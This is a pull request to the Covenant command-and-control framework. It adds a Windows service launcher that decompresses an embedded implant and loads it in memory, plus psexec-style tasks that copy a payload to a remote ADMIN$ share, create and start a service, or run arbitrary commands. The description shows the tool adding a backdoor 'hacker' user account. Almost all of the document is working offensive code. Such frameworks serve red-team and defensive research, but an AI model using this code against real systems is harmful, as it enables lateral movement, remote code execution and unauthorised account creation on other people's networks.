### PR TITLE
Add ServiceBinary Launcher and SCM[Grunt/Command] Tasks

### DIFF
--- a/Covenant/Components/Launchers/CreateLauncher.razor
+++ b/Covenant/Components/Launchers/CreateLauncher.razor
@@ -170,6 +170,11 @@
                     binaryLauncher = await Service.EditBinaryLauncher(binaryLauncher);
                     Launcher = await Service.GenerateBinaryLauncher();
                     break;
+                case "ServiceBinary":
+                    ServiceBinaryLauncher serviceBinaryLauncher = (ServiceBinaryLauncher)aLauncher;
+                    serviceBinaryLauncher = await Service.EditServiceBinaryLauncher(serviceBinaryLauncher);
+                    Launcher = await Service.GenerateServiceBinaryLauncher();
+                    break;
                 case "ShellCode":
                     ShellCodeLauncher shellcodeLauncher = (ShellCodeLauncher)aLauncher;
                     shellcodeLauncher = await Service.EditShellCodeLauncher(shellcodeLauncher);
@@ -241,6 +246,12 @@
                     binaryLauncher = await Service.GenerateBinaryLauncher();
                     file = await Service.CreateHostedFile(file);
                     Launcher = await Service.GenerateBinaryHostedLauncher(file);
+                    break;
+                case "ServiceBinary":
+                    ServiceBinaryLauncher serviceBinaryLauncher = (ServiceBinaryLauncher)Launcher;
+                    serviceBinaryLauncher = await Service.GenerateServiceBinaryLauncher();
+                    file = await Service.CreateHostedFile(file);
+                    Launcher = await Service.GenerateServiceBinaryHostedLauncher(file);
                     break;
                 case "ShellCode":
                     ShellCodeLauncher shellcodeLauncher = (ShellCodeLauncher)Launcher;
@@ -317,7 +328,7 @@
             string code = ((PowerShellLauncher)Launcher).PowerShellCode;
             content = string.IsNullOrEmpty(code) ? "" : Convert.ToBase64String(Common.CovenantEncoding.GetBytes(code));
         }
-        else if (Launcher.Name == "InstallUtil")
+        else if (Launcher.Name == "InstallUtil" || Launcher.Name == "ServiceBinary")
         {
             string code = ((DiskLauncher)Launcher).DiskCode;
             content = code == null ? "" : code;

--- a/Covenant/Components/Launchers/LauncherForm.razor
+++ b/Covenant/Components/Launchers/LauncherForm.razor
@@ -135,6 +135,8 @@
     {
         case "Binary":
             break;
+        case "ServiceBinary":
+            break;
         case "ShellCode":
             break;
         case "Cscript":
@@ -301,6 +303,11 @@
                 fileext = ".exe";
                 mediatype = MediaTypeNames.Application.Octet;
                 content = ((BinaryLauncher)this.Launcher).Base64ILByteString;
+                break;
+            case LauncherType.ServiceBinary:
+                fileext = "SVC.exe"; // bit of a hack to get the SVC in the filename, but I like having it.
+                mediatype = MediaTypeNames.Application.Octet;
+                content = Convert.ToBase64String(Convert.FromBase64String(((ServiceBinaryLauncher)this.Launcher).DiskCode));
                 break;
             case LauncherType.ShellCode:
                 fileext = ".bin";

--- a/Covenant/Core/CovenantHubService.cs
+++ b/Covenant/Core/CovenantHubService.cs
@@ -1224,5 +1224,25 @@ namespace Covenant.Core
         {
             return _connection.InvokeAsync<GruntTaskAuthor>("EditGruntTaskAuthor", author);
         }
+
+        public Task<ServiceBinaryLauncher> GetServiceBinaryLauncher()
+        {
+            return _connection.InvokeAsync<ServiceBinaryLauncher>("GetServiceBinaryLauncher");
+        }
+
+        public Task<ServiceBinaryLauncher> GenerateServiceBinaryLauncher()
+        {
+            return _connection.InvokeAsync<ServiceBinaryLauncher>("GenerateServiceBinaryLauncher");
+        }
+
+        public Task<ServiceBinaryLauncher> GenerateServiceBinaryHostedLauncher(HostedFile file)
+        {
+            return _connection.InvokeAsync<ServiceBinaryLauncher>("GenerateServiceBinaryHostedLauncher", file);
+        }
+
+        public Task<ServiceBinaryLauncher> EditServiceBinaryLauncher(ServiceBinaryLauncher launcher)
+        {
+            return _connection.InvokeAsync<ServiceBinaryLauncher>("EditServiceBinaryLauncher", launcher);
+        }
     }
 }

--- a/Covenant/Core/CovenantService.cs
+++ b/Covenant/Core/CovenantService.cs
@@ -316,6 +316,10 @@ namespace Covenant.Core
         Task<BinaryLauncher> GenerateBinaryLauncher();
         Task<BinaryLauncher> GenerateBinaryHostedLauncher(HostedFile file);
         Task<BinaryLauncher> EditBinaryLauncher(BinaryLauncher launcher);
+        Task<ServiceBinaryLauncher> GetServiceBinaryLauncher();
+        Task<ServiceBinaryLauncher> GenerateServiceBinaryLauncher();
+        Task<ServiceBinaryLauncher> GenerateServiceBinaryHostedLauncher(HostedFile file);
+        Task<ServiceBinaryLauncher> EditServiceBinaryLauncher(ServiceBinaryLauncher launcher);
         Task<ShellCodeLauncher> GetShellCodeLauncher();
         Task<ShellCodeLauncher> GenerateShellCodeLauncher();
         Task<ShellCodeLauncher> GenerateShellCodeHostedLauncher(HostedFile file);
@@ -4352,6 +4356,96 @@ public static class Task
             await _context.SaveChangesAsync();
             // _notifier.OnEditLauncher(this, matchingLauncher);
             return await this.GetBinaryLauncher();
+        }
+
+        public async Task<ServiceBinaryLauncher> GetServiceBinaryLauncher()
+        {
+            ServiceBinaryLauncher launcher = (ServiceBinaryLauncher)await _context.Launchers.FirstOrDefaultAsync(S => S.Type == LauncherType.ServiceBinary);
+            if (launcher == null)
+            {
+                throw new ControllerNotFoundException($"NotFound - ServiceBinaryLauncher");
+            }
+            return launcher;
+        }
+
+        public async Task<ServiceBinaryLauncher> GenerateServiceBinaryLauncher()
+        {
+            ServiceBinaryLauncher launcher = await this.GetServiceBinaryLauncher();
+            Listener listener = await this.GetListener(launcher.ListenerId);
+            ImplantTemplate template = await this.GetImplantTemplate(launcher.ImplantTemplateId);
+            Profile profile = await this.GetProfile(listener.ProfileId);
+
+            if (!template.CompatibleListenerTypes.Select(LT => LT.Id).Contains(listener.ListenerTypeId))
+            {
+                throw new ControllerBadRequestException($"BadRequest - ListenerType not compatible with chosen ImplantTemplate");
+            }
+
+            Grunt grunt = new Grunt
+            {
+                ListenerId = listener.Id,
+                Listener = listener,
+                ImplantTemplateId = template.Id,
+                ImplantTemplate = template,
+                SMBPipeName = launcher.SMBPipeName,
+                ValidateCert = launcher.ValidateCert,
+                UseCertPinning = launcher.UseCertPinning,
+                Delay = launcher.Delay,
+                JitterPercent = launcher.JitterPercent,
+                ConnectAttempts = launcher.ConnectAttempts,
+                KillDate = launcher.KillDate,
+                DotNetVersion = launcher.DotNetVersion,
+                RuntimeIdentifier = launcher.RuntimeIdentifier
+            };
+
+            await _context.Grunts.AddAsync(grunt);
+            await _context.SaveChangesAsync();
+            await _notifier.NotifyCreateGrunt(this, grunt);
+
+            launcher.GetLauncher(
+                this.GruntTemplateReplace(template.StagerCode, template, grunt, listener, profile),
+                CompileGruntCode(template.StagerCode, template, grunt, listener, profile, launcher),
+                grunt,
+                template
+            );
+            _context.Launchers.Update(launcher);
+            await _context.SaveChangesAsync();
+            // _notifier.OnEditLauncher(this, launcher);
+            return await this.GetServiceBinaryLauncher();
+        }
+
+        public async Task<ServiceBinaryLauncher> GenerateServiceBinaryHostedLauncher(HostedFile file)
+        {
+            ServiceBinaryLauncher launcher = await this.GetServiceBinaryLauncher();
+            Listener listener = await this.GetListener(launcher.ListenerId);
+            HostedFile savedFile = await this.GetHostedFile(file.Id);
+            string hostedLauncher = launcher.GetHostedLauncher(listener, savedFile);
+            _context.Launchers.Update(launcher);
+            await _context.SaveChangesAsync();
+            // _notifier.OnEditLauncher(this, launcher);
+            return await this.GetServiceBinaryLauncher();
+        }
+
+        public async Task<ServiceBinaryLauncher> EditServiceBinaryLauncher(ServiceBinaryLauncher launcher)
+        {
+            ServiceBinaryLauncher matchingLauncher = await this.GetServiceBinaryLauncher();
+            Listener listener = await this.GetListener(launcher.ListenerId);
+            matchingLauncher.ListenerId = listener.Id;
+            matchingLauncher.ImplantTemplateId = launcher.ImplantTemplateId;
+            matchingLauncher.DotNetVersion = launcher.DotNetVersion;
+            matchingLauncher.RuntimeIdentifier = launcher.RuntimeIdentifier;
+            matchingLauncher.SMBPipeName = launcher.SMBPipeName;
+            matchingLauncher.ValidateCert = launcher.ValidateCert;
+            matchingLauncher.UseCertPinning = launcher.UseCertPinning;
+            matchingLauncher.Delay = launcher.Delay;
+            matchingLauncher.JitterPercent = launcher.JitterPercent;
+            matchingLauncher.ConnectAttempts = launcher.ConnectAttempts;
+            matchingLauncher.KillDate = launcher.KillDate;
+            matchingLauncher.LauncherString = launcher.LauncherString;
+            matchingLauncher.StagerCode = launcher.StagerCode;
+            _context.Launchers.Update(matchingLauncher);
+            await _context.SaveChangesAsync();
+            // _notifier.OnEditLauncher(this, matchingLauncher);
+            return await this.GetServiceBinaryLauncher();
         }
 
         public async Task<ShellCodeLauncher> GetShellCodeLauncher()

--- a/Covenant/Core/CovenantService.cs
+++ b/Covenant/Core/CovenantService.cs
@@ -2788,6 +2788,16 @@ namespace Covenant.Core
                 if (!parameters[1].StartsWith("C:\\", StringComparison.OrdinalIgnoreCase)) { parameters[1] = Directory + parameters[1]; }
                 if (split.Count > 1) { parameters[1] += " " + String.Join(" ", split.Skip(1).ToArray()); }
             }
+            else if (tasking.GruntTask.Name.Equals("scmgrunt", StringComparison.OrdinalIgnoreCase))
+            {
+                Launcher l = await _context.Launchers.FirstOrDefaultAsync(L => L.Name.ToLower() == parameters[1].ToLower());
+                if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
+                {
+                    throw new ControllerNotFoundException($"NotFound - Launcher with name: {parameters[1]}");
+                }
+
+                parameters[1] = ((ServiceBinaryLauncher)l).DiskCode;
+            }
             else if (tasking.GruntTask.Name.Equals("dcomgrunt", StringComparison.OrdinalIgnoreCase))
             {
                 Launcher l = await _context.Launchers.FirstOrDefaultAsync(L => L.Name.ToLower() == parameters[1].ToLower());

--- a/Covenant/Core/DbInitializer.cs
+++ b/Covenant/Core/DbInitializer.cs
@@ -147,6 +147,7 @@ namespace Covenant.Core
                 var launchers = new Launcher[]
                 {
                     new BinaryLauncher(),
+                    new ServiceBinaryLauncher(),
                     new ShellCodeLauncher(),
                     new PowerShellLauncher(),
                     new MSBuildLauncher(),

--- a/Covenant/Data/Tasks/SharpSploit.LateralMovement.yaml
+++ b/Covenant/Data/Tasks/SharpSploit.LateralMovement.yaml
@@ -758,3 +758,227 @@
     EmbeddedResources: []
   ReferenceAssemblies: []
   EmbeddedResources: []
+- Name: SCMGrunt
+  Aliases:
+  - psexec
+  Author:
+    Name: Daniel Duggan
+    Handle: _RastaMouse
+    Link: https://twitter.com/_RastaMouse
+  Description: Execute a Grunt Launcher on a remote system using the Service Control Manager.
+  Help: This Task requires that the service be stopped and the service binary removed manually.
+  Language: CSharp
+  CompatibleDotNetVersions:
+  - Net35
+  - Net40
+  Code: "using System;\nusing System.IO;\nusing System.Linq;\nusing SharpSploit.LateralMovement;\n\npublic static class Task\n{\n    public static string Execute(string ComputerName, string EncodedLauncher)\n    {       \n        try\n        {\n        	var randName = GenerateRandomString(8);\n            var remotePath = $@\"\\\\{ComputerName}\\ADMIN$\\{randName}.exe\";\n            \n        	File.WriteAllBytes(remotePath, Convert.FromBase64String(EncodedLauncher));\n            \n            if (SCM.CreateService(ComputerName, randName, \"\", $@\"C:\\Windows\\{randName}.exe\"))\n            {\n            	if (SCM.StartService(ComputerName, randName))\n                {\n                	if (SCM.DeleteService(ComputerName, randName))\n                    {\n                    	return $\"[+] Service {randName} created ({remotePath})\";\n                    }\n                	else { return \"[x] Failed to delete service\"; }\n                }\n                else { return \"[x] Failed to start service\"; }\n            }\n            else { return \"[x] Failed to create service\"; }\n        }\n        catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n    }\n    private static string GenerateRandomString(int length)\n    {\n        var random = new Random();\n        const string chars = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\n        return new string(Enumerable.Repeat(chars, length)\n          .Select(s => s[random.Next(s.Length)]).ToArray());\n    }\n}"
+  TaskingType: Assembly
+  UnsafeCompile: false
+  TokenTask: false
+  Options:
+  - Name: ComputerName
+    Value: ''
+    DefaultValue: ''
+    Description: ComputerName to launch the Grunt on.
+    SuggestedValues: []
+    Optional: false
+    DisplayInCommand: true
+    FileOption: false
+  - Name: Launcher
+    Value: ''
+    DefaultValue: ''
+    Description: Grunt Launcher to execute on the remote system.
+    SuggestedValues: []
+    Optional: false
+    DisplayInCommand: true
+    FileOption: false
+  ReferenceSourceLibraries:
+  - Name: SharpSploit
+    Description: SharpSploit is a library for C# post-exploitation modules.
+    Location: SharpSploit\SharpSploit\
+    Language: CSharp
+    CompatibleDotNetVersions:
+    - Net35
+    - Net40
+    ReferenceAssemblies:
+    - Name: System.IdentityModel.dll
+      Location: net35\System.IdentityModel.dll
+      DotNetVersion: Net35
+    - Name: System.Core.dll
+      Location: net40\System.Core.dll
+      DotNetVersion: Net40
+    - Name: System.DirectoryServices.dll
+      Location: net40\System.DirectoryServices.dll
+      DotNetVersion: Net40
+    - Name: System.DirectoryServices.Protocols.dll
+      Location: net40\System.DirectoryServices.Protocols.dll
+      DotNetVersion: Net40
+    - Name: System.dll
+      Location: net40\System.dll
+      DotNetVersion: Net40
+    - Name: System.IdentityModel.dll
+      Location: net40\System.IdentityModel.dll
+      DotNetVersion: Net40
+    - Name: System.Management.Automation.dll
+      Location: net40\System.Management.Automation.dll
+      DotNetVersion: Net40
+    - Name: System.Management.dll
+      Location: net40\System.Management.dll
+      DotNetVersion: Net40
+    - Name: System.ServiceProcess.dll
+      Location: net40\System.ServiceProcess.dll
+      DotNetVersion: Net40
+    - Name: mscorlib.dll
+      Location: net40\mscorlib.dll
+      DotNetVersion: Net40
+    - Name: System.XML.dll
+      Location: net35\System.XML.dll
+      DotNetVersion: Net35
+    - Name: System.Windows.Forms.dll
+      Location: net35\System.Windows.Forms.dll
+      DotNetVersion: Net35
+    - Name: System.dll
+      Location: net35\System.dll
+      DotNetVersion: Net35
+    - Name: System.DirectoryServices.Protocols.dll
+      Location: net35\System.DirectoryServices.Protocols.dll
+      DotNetVersion: Net35
+    - Name: System.DirectoryServices.dll
+      Location: net35\System.DirectoryServices.dll
+      DotNetVersion: Net35
+    - Name: System.Core.dll
+      Location: net35\System.Core.dll
+      DotNetVersion: Net35
+    - Name: mscorlib.dll
+      Location: net35\mscorlib.dll
+      DotNetVersion: Net35
+    - Name: System.Management.Automation.dll
+      Location: net35\System.Management.Automation.dll
+      DotNetVersion: Net35
+    - Name: System.Management.dll
+      Location: net35\System.Management.dll
+      DotNetVersion: Net35
+    - Name: System.ServiceProcess.dll
+      Location: net35\System.ServiceProcess.dll
+      DotNetVersion: Net35
+    - Name: System.Windows.Forms.dll
+      Location: net40\System.Windows.Forms.dll
+      DotNetVersion: Net40
+    - Name: System.XML.dll
+      Location: net40\System.XML.dll
+      DotNetVersion: Net40
+    EmbeddedResources: []
+  ReferenceAssemblies: []
+  EmbeddedResources: []
+- Name: SCMCommand
+  Aliases:
+  - psexec_cmd
+  Author:
+    Name: Daniel Duggan
+    Handle: _RastaMouse
+    Link: https://twitter.com/_RastaMouse
+  Description: Execute a command on a remote system using the Service Control Manager.
+  Help: ''
+  Language: CSharp
+  CompatibleDotNetVersions:
+  - Net35
+  - Net40
+  Code: "using System;\nusing System.IO;\nusing System.Linq;\n\nusing SharpSploit.LateralMovement;\n\npublic static class Task\n{\n    public static string Execute(string ComputerName, string Command)\n    {\n    	var randName = GenerateRandomString(8);\n    \n        try\n        {\n			SCM.CreateService(ComputerName, randName, \"\", Command);\n            SCM.StartService(ComputerName, randName); // will almost always throw an exception as we're not using valid service binaries\n            SCM.DeleteService(ComputerName, randName);\n            \n            return $@\"[+] Service {randName} created ({Command})\";\n        }\n        catch (Exception e)\n        {\n        	if (e.Message.Contains(\"Cannot start service\"))\n            {\n            	SCM.DeleteService(ComputerName, randName);\n                return $@\"[+] Service {randName} created ({Command})\";\n            }\n            else\n            {\n        		return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace;\n            }\n        }\n    }\n    private static string GenerateRandomString(int length)\n    {\n        var random = new Random();\n        const string chars = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\n        return new string(Enumerable.Repeat(chars, length)\n          .Select(s => s[random.Next(s.Length)]).ToArray());\n    }\n}"
+  TaskingType: Assembly
+  UnsafeCompile: false
+  TokenTask: false
+  Options:
+  - Name: ComputerName
+    Value: ''
+    DefaultValue: ''
+    Description: ComputerName to launch the Command on.
+    SuggestedValues: []
+    Optional: false
+    DisplayInCommand: true
+    FileOption: false
+  - Name: Command
+    Value: ''
+    DefaultValue: ''
+    Description: Command to execute on the remote system.
+    SuggestedValues: []
+    Optional: false
+    DisplayInCommand: true
+    FileOption: false
+  ReferenceSourceLibraries:
+  - Name: SharpSploit
+    Description: SharpSploit is a library for C# post-exploitation modules.
+    Location: SharpSploit\SharpSploit\
+    Language: CSharp
+    CompatibleDotNetVersions:
+    - Net35
+    - Net40
+    ReferenceAssemblies:
+    - Name: System.IdentityModel.dll
+      Location: net35\System.IdentityModel.dll
+      DotNetVersion: Net35
+    - Name: System.Core.dll
+      Location: net40\System.Core.dll
+      DotNetVersion: Net40
+    - Name: System.DirectoryServices.dll
+      Location: net40\System.DirectoryServices.dll
+      DotNetVersion: Net40
+    - Name: System.DirectoryServices.Protocols.dll
+      Location: net40\System.DirectoryServices.Protocols.dll
+      DotNetVersion: Net40
+    - Name: System.dll
+      Location: net40\System.dll
+      DotNetVersion: Net40
+    - Name: System.IdentityModel.dll
+      Location: net40\System.IdentityModel.dll
+      DotNetVersion: Net40
+    - Name: System.Management.Automation.dll
+      Location: net40\System.Management.Automation.dll
+      DotNetVersion: Net40
+    - Name: System.Management.dll
+      Location: net40\System.Management.dll
+      DotNetVersion: Net40
+    - Name: System.ServiceProcess.dll
+      Location: net40\System.ServiceProcess.dll
+      DotNetVersion: Net40
+    - Name: mscorlib.dll
+      Location: net40\mscorlib.dll
+      DotNetVersion: Net40
+    - Name: System.XML.dll
+      Location: net35\System.XML.dll
+      DotNetVersion: Net35
+    - Name: System.Windows.Forms.dll
+      Location: net35\System.Windows.Forms.dll
+      DotNetVersion: Net35
+    - Name: System.dll
+      Location: net35\System.dll
+      DotNetVersion: Net35
+    - Name: System.DirectoryServices.Protocols.dll
+      Location: net35\System.DirectoryServices.Protocols.dll
+      DotNetVersion: Net35
+    - Name: System.DirectoryServices.dll
+      Location: net35\System.DirectoryServices.dll
+      DotNetVersion: Net35
+    - Name: System.Core.dll
+      Location: net35\System.Core.dll
+      DotNetVersion: Net35
+    - Name: mscorlib.dll
+      Location: net35\mscorlib.dll
+      DotNetVersion: Net35
+    - Name: System.Management.Automation.dll
+      Location: net35\System.Management.Automation.dll
+      DotNetVersion: Net35
+    - Name: System.Management.dll
+      Location: net35\System.Management.dll
+      DotNetVersion: Net35
+    - Name: System.ServiceProcess.dll
+      Location: net35\System.ServiceProcess.dll
+      DotNetVersion: Net35
+    - Name: System.Windows.Forms.dll
+      Location: net40\System.Windows.Forms.dll
+      DotNetVersion: Net40
+    - Name: System.XML.dll
+      Location: net40\System.XML.dll
+      DotNetVersion: Net40
+    EmbeddedResources: []
+  ReferenceAssemblies: []
+  EmbeddedResources: []

--- a/Covenant/Models/CovenantContext.cs
+++ b/Covenant/Models/CovenantContext.cs
@@ -76,6 +76,7 @@ namespace Covenant.Models
             builder.Entity<MSBuildLauncher>();
             builder.Entity<PowerShellLauncher>();
             builder.Entity<BinaryLauncher>();
+            builder.Entity<ServiceBinaryLauncher>();
             builder.Entity<ShellCodeLauncher>();
 
             builder.Entity<CapturedPasswordCredential>();

--- a/Covenant/Models/Launchers/Launcher.cs
+++ b/Covenant/Models/Launchers/Launcher.cs
@@ -26,6 +26,7 @@ namespace Covenant.Models.Launchers
         Wscript,
         PowerShell,
         Binary,
+        ServiceBinary,
         MSBuild,
         InstallUtil,
         ShellCode

--- a/Covenant/Models/Launchers/ServiceBinaryLauncher.cs
+++ b/Covenant/Models/Launchers/ServiceBinaryLauncher.cs
@@ -73,6 +73,7 @@ using System.IO;
 using System.IO.Compression;
 using System.Reflection;
 using System.ServiceProcess;
+using System.Threading;
 
 namespace Grunt
 {
@@ -106,7 +107,10 @@ namespace Grunt
                 r = ds.Read(by, 0, 1024);
             }
 
-            Assembly.Load(oms.ToArray()).EntryPoint.Invoke(0, new object[] { new string[] { } });
+            new Thread(delegate()
+            {
+                Assembly.Load(oms.ToArray()).EntryPoint.Invoke(0, new object[] { new string[] { } });
+            }).Start();   
         }
 
         protected override void OnStop() {}
@@ -122,6 +126,7 @@ namespace Grunt
             {
                 components.Dispose();
             }
+
             base.Dispose(disposing);
         }
 

--- a/Covenant/Models/Launchers/ServiceBinaryLauncher.cs
+++ b/Covenant/Models/Launchers/ServiceBinaryLauncher.cs
@@ -1,0 +1,136 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: Covenant (https://github.com/cobbr/Covenant)
+// License: GNU GPLv3
+
+using System;
+using System.Linq;
+using Microsoft.CodeAnalysis;
+
+using Covenant.Core;
+using Covenant.Models.Grunts;
+using Covenant.Models.Listeners;
+
+namespace Covenant.Models.Launchers
+{
+    public class ServiceBinaryLauncher : DiskLauncher
+    {
+        public ServiceBinaryLauncher()
+        {
+            this.Name = "ServiceBinary";
+            this.Type = LauncherType.ServiceBinary;
+            this.Description = "Uses a generated .NET Framework Service binary to launch a Grunt.";
+            this.OutputKind = OutputKind.ConsoleApplication;
+            this.CompressStager = true;
+        }
+
+        public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
+        {
+            this.StagerCode = StagerCode;
+            this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);
+            
+            var code = CodeTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
+            
+            var references = grunt.DotNetVersion == Common.DotNetVersion.Net35 ? Common.DefaultNet35References : Common.DefaultNet40References;
+            references.Add(new Compiler.Reference
+            {
+                File = grunt.DotNetVersion == Common.DotNetVersion.Net35 ? Common.CovenantAssemblyReferenceNet35Directory + "System.ServiceProcess.dll" : Common.CovenantAssemblyReferenceNet40Directory + "System.ServiceProcess.dll",
+                Framework = grunt.DotNetVersion,
+                Enabled = true
+            });
+
+            this.DiskCode = Convert.ToBase64String(Compiler.Compile(new Compiler.CsharpFrameworkCompilationRequest
+            {
+                Language = template.Language,
+                Source = code,
+                TargetDotNetVersion = grunt.DotNetVersion,
+                OutputKind = OutputKind.ConsoleApplication,
+                References = references
+            }));
+
+            this.LauncherString = string.Format("{0}{1}.exe", template.Name, "SVC");
+            return this.LauncherString;
+        }
+
+        public override string GetHostedLauncher(Listener listener, HostedFile hostedFile)
+        {
+            var httpListener = listener as HttpListener;
+
+            if (httpListener != null)
+            {
+                var location = new Uri(httpListener.Urls.FirstOrDefault() + hostedFile.Path);
+                this.LauncherString = hostedFile.Path.Split("\\").Last().Split("/").Last();
+                return location.ToString();
+            }
+            else
+            {
+                return "";
+            }
+        }
+
+        private static readonly string CodeTemplate =
+@"using System;
+using System.IO;
+using System.IO.Compression;
+using System.Reflection;
+using System.ServiceProcess;
+
+namespace Grunt
+{
+    static class Program
+    {
+        static void Main()
+        {
+            ServiceBase[] ServicesToRun;
+            ServicesToRun = new ServiceBase[] { new Service() };
+            ServiceBase.Run(ServicesToRun);
+        }
+    }
+
+    public partial class Service : ServiceBase
+    {
+        public Service()
+        {
+            InitializeComponent();
+        }
+
+        protected override void OnStart(string[] args)
+        {
+            var oms = new MemoryStream();
+            var ds = new DeflateStream(new MemoryStream(Convert.FromBase64String(""{{GRUNT_IL_BYTE_STRING}}"")), CompressionMode.Decompress);
+            var by = new byte[1024];
+            var r = ds.Read(by, 0, 1024);
+
+            while (r > 0)
+            {
+                oms.Write(by, 0, r);
+                r = ds.Read(by, 0, 1024);
+            }
+
+            Assembly.Load(oms.ToArray()).EntryPoint.Invoke(0, new object[] { new string[] { } });
+        }
+
+        protected override void OnStop() {}
+    }
+
+    partial class Service
+    {
+        private System.ComponentModel.IContainer components = null;
+
+        protected override void Dispose(bool disposing)
+        {
+            if (disposing && (components != null))
+            {
+                components.Dispose();
+            }
+            base.Dispose(disposing);
+        }
+
+        private void InitializeComponent()
+        {
+            components = new System.ComponentModel.Container();
+            this.ServiceName = ""Service"";
+        }
+    }
+}";
+    }
+}


### PR DESCRIPTION
## PR Summary

### ServiceBinary Launcher
Added a new `ServiceBinary` Launcher which is compatible with the Windows Service Control Manager.  The launcher code is a barebones service template that takes the `GRUNT_IL_BYTE_STRING`, calls `Assembly.Load` and invokes the EntryPoint (same pattern as the `InstallUtil` Launcher).

### SCMGrunt Task
Added a new `SCMGrunt` Task (`psexec` alias) which automates lateral movement using the aforementioned launcher.  It uploads the launcher binary to `\\<ComputerName>\ADMIN$\<randomName>.exe` and uses the `SCM.PSExec` method in `SharpSploit.LateralMovement` to create/start/delete the service.

#### Usage
```
(rasta) > psexec localhost ServiceBinary

[+] Service UZABZ60H created (\\localhost\ADMIN$\UZABZ60H.exe)


(rasta) > Connect localhost gruntsvc

Connection to Blade:gruntsvc succeeded!
```

### SCMCommand Task
Added a new `SCMCommand` Task (`psexec_cmd` alias) which allows (some) arbitrary code execution by providing a `Command` in place of the `BinaryPath`.

#### Usage
```
(rasta) > shell net user hacker

The user name could not be found.

More help is available by typing NET HELPMSG 2221.


(rasta) > psexec_cmd localhost "cmd.exe /c net user hacker Passw0rd! /add"

[+] Service I318YBDR created (cmd.exe /c net user hacker Passw0rd! /add)


(rasta) > shell net user hacker

User name                    hacker
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
```

Comments welcome.